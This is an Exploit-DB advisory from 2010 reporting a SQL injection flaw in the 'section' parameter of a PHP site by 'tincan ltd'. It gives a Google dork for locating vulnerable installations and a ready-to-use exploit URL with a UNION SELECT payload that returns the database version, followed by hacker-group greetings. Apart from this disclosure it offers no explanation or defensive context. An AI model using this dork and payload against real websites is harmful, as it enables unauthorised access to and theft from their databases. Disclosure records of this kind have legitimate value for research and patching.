tincan ltd - 'section' SQL Injection

EDB-ID:

11113

CVE:

N/A


Author:

ALTBTA

Type:

webapps


Platform:

PHP

Date:

2010-01-11


+/=============================================\+
# [+] Title : tincan ltd (section) SQL Injection Vulnerability
# [+] site s.p : www.tincan.co.uk<http://www.tincan.co.uk>
# [+] Author : altbta
# [+] Email : l_9@HoTMaIL.com
# [+] home : v4-team.com<http://v4-team.com> & tryag.cc
+\=============================================/+

===============================================
DorK : intext:'powered by tincan ltd' and  inurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================
GreeTz To :
  RxH   &    ab0-3th4b   &   sniper site